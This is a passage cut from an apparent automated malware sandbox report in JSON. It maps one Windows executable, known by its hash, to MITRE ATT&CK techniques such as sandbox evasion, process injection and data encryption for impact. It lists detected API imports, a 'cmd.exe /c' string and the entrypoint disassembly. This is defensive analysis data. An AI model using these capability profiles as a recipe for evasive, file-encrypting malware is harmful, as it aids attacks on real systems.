"T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 1, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Impact", "technique": "Data Encrypted for Impact", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486", "suspicious_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "informative_identifiers_count": 2}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "string-345", "type": 2, "relevance": 1, "name": "Contains ability to disable/close registry key (API string)", "description": "Found reference to API \"RegCloseKey\" (Indicator: \"RegCloseKey\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API \"RegCloseKey\" (Indicator: \"RegCloseKey\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-423", "type": 2, "relevance": 1, "name": "Contains ability to create directories (API string)", "description": "Found reference to API \"CreateDirectoryA\" (Indicator: \"CreateDirectory\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API \"CreateDirectoryW\" (Indicator: \"CreateDirectory\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API \"CreateDirectoryW\" (Indicator: \"CreateDirectory\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API \"CreateDirectoryA\" (Indicator: \"CreateDirectory\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-204", "type": 2, "relevance": 1, "name": "Contains ability to create a new process (API string)", "description": "Found reference to API \"CreateProcessA\" (Indicator: \"CreateProcess\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API \"CreateProcessA\" (Indicator: \"CreateProcess\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-315", "type": 2, "relevance": 1, "name": "Contains ability to create/open files (API string)", "description": "Found reference to API \"CreateFileA\" (Indicator: \"CreateFile\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API \"CreateFileW\" (Indicator: \"CreateFile\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API \"CreateFileA\" (Indicator: \"CreateFile\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-174", "type": 2, "relevance": 1, "name": "Contains ability to executes commands or batch file", "description": "Found string \"cmd.exe /c \"%s\"\" (Indicator: \"cmd.exe /c\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")", "origin": "File/Memory", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-120", "type": 2, "relevance": 1, "name": "Contains registry location strings", "description": "\"Software\\\" in Source: e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38", "origin": "File/Memory", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,push\t-1,push\t0x40d488,push\t0x4076f4,mov\teax, dword ptr fs:[0],push\teax,mov\tdword ptr fs:[0], esp,sub\tesp, 0x68,push\tebx,push\tesi,push\tedi,mov\tdword ptr [ebp - 0x18], esp,xor\tebx, ebx,mov\tdword ptr [ebp - 4], ebx,push\t2,call\tdword ptr [0x4081c4],pop\tecx,or\tdword ptr [0x40f94c], 0xffffffff,or\tdword ptr [0x40f950], 0xffffffff,call\tdword ptr [0x4081c0],mov\tecx, dword ptr [0x40f948],mov\tdword ptr [eax], ecx,call\tdword ptr [0x4081bc],mov\tecx, dword ptr [0x40f944],mov\tdword ptr [eax], ecx,mov\teax, dword ptr [0x4081b8],\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-307", "type": 2, "relevance": 1, "name": "Contains ability to create/load registry keys (API string)", "description": "Found reference to API \"RegCreateKeyW\" (Indicator: \"RegCreateKey\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API \"RegCreateKeyW\" (Indicator: \"RegCreateKey\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-550", "type": 2, "relevance": 1, "name": "Contains ability to find and load resources of specific modules (API string)", "description": "Found reference to API \"SizeofResource\" (Indicator: \"SizeofResource\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API \"LockResource\" (Indicator: \"LockResource\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API \"LoadResource\" (Indicator: \"LoadResource\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API \"FindResourceA\" (Indicator: \"FindResource\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API \"SizeofResource\" (Indicator: \"SizeofResource\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API \"LockResource\" (Indicator: \"LockResource\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API \"LoadResource\" (Indicator: \"LoadResource\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API \"FindResourceA\" (Indicator: \"FindResource\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-319", "type": 2, "relevance": 1, "name": "Contains ability to set/get the last-error code for a calling thread (API string)", "description": "Found reference to API \"SetLastError\" (Indicator: \"SetLastError\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API \"SetLastError\" (Indicator: \"SetLastError\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-322", "type": 2, "relevance": 1, "name": "Contains ability to move file or directory (API string)", "description": "Found reference to API \"MoveFileExW\" (Indicator: \"MoveFile\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API \"MoveFileW\" (Indicator: \"MoveFile\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")", "origin": "File/Memory", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-124", "relevance": 3, "name": "PE file has a big virtual size section", "description": "Virtual size of \".rsrc\" is \"0x349fa0\" greater than 0x100000", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-79", "relevance": 1, "name": "Contains ability to dynamically determine API calls", "description": "Found GetProcAddress() and LoadLibraryA() in an import section (Source: e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38)", "origin": "Static Parser", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-101", "type": 2, "relevance": 1, "name": "Contains ability to execute Windows APIs", "description": "Found reference to API (Indicator: \"CloseServiceHandle\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"CryptReleaseContext\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"RegCloseKey\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"OpenServiceA\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"CreateServiceA\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"RegQueryValueExA\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"RegCreateKeyW\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"RegSetValueExA\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"StartServiceA\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"OpenSCManagerA\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"SetCurrentDirectoryW\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"HeapFree\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"EnterCriticalSection\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"LoadLibraryA\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"GetFileAttributesA\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"GlobalFree\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"WaitForSingleObject\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"FreeLibrary\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"CopyFileA\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"HeapAlloc\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"SetFileTime\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"VirtualProtect\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"GetFileAttributesW\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"GetModuleFileNameA\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"DeleteCriticalSection\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"GetStartupInfoA\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"SystemTimeToFileTime\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"SizeofResource\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"GetWindowsDirectoryW\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"GetFileSize\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"LockResource\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"CreateDirectoryA\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"GetCurrentDirectoryA\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"MultiByteToWideChar\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"CreateDirectoryW\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"GetProcAddress\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"GetProcessHeap\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"OpenMutexA\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"GetComputerNameW\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"SetFilePointer\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"GetFileSizeEx\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"GetModuleHandleA\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"ReadFile\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"GetTempPathW\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"CloseHandle\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"GetFullPathNameA\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"GetExitCodeProcess\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"TerminateProcess\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"CreateProcessA\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"InitializeCriticalSection\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"LoadResource\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"WriteFile\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"GlobalAlloc\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"VirtualFree\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"LocalFileTimeToFileTime\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"Sleep\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"IsBadReadPtr\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"SetFileAttributesW\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"CreateFileA\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"FindResourceA\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"VirtualAlloc\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"SetCurrentDirectoryA\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"SetLastError\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"LeaveCriticalSection\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"wsprintfA\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"DeleteFileW\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"MoveFileExW\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"MoveFileW\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"CreateFileW\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"CryptGenKey\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"CryptDecrypt\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"CryptEncrypt\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"CryptDestroyKey\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"CryptImportKey\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"CryptAcquireContextA\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"GetNativeSystemInfo\"; File: \"e04a218e97e4d598eea4839c9119f1927ef3cddb1ca22a42d6c67c21d1babd38\")\n Found reference to API (Indicator: \"CloseHandle\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetExitCodeProcess\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API (Indicator: \"TerminateProcess\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API (Indicator: \"WaitForSingleObject\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API (Indicator: \"CreateProcessA\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API (Indicator: \"GlobalFree\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetProcAddress\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API (Indicator: \"LoadLibraryA\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API (Indicator: \"GlobalAlloc\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API (Indicator: \"SetCurrentDirectoryA\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetCurrentDirectoryA\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetComputerNameW\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API (Indicator: \"SetFileTime\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API (Indicator: \"SetFilePointer\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API (Indicator: \"MultiByteToWideChar\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetFileAttributesW\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetFileSizeEx\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API (Indicator: \"CreateFileA\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API (Indicator: \"InitializeCriticalSection\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API (Indicator: \"DeleteCriticalSection\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API (Indicator: \"ReadFile\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetFileSize\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API (Indicator: \"WriteFile\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API (Indicator: \"LeaveCriticalSection\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API (Indicator: \"EnterCriticalSection\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API (Indicator: \"SetFileAttributesW\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API (Indicator: \"SetCurrentDirectoryW\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API (Indicator: \"CreateDirectoryW\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetTempPathW\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetWindowsDirectoryW\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API (Indicator: \"GetFileAttributesA\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API (Indicator: \"SizeofResource\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API (Indicator: \"LockResource\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API (Indicator: \"LoadResource\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API (Indicator: \"FindResourceA\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API (Indicator: \"Sleep\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to API (Indicator: \"OpenMutexA\"; Source: \"00000000-00005464.00000000.250610.00408000.00000002.mdmp\")\n Found reference to 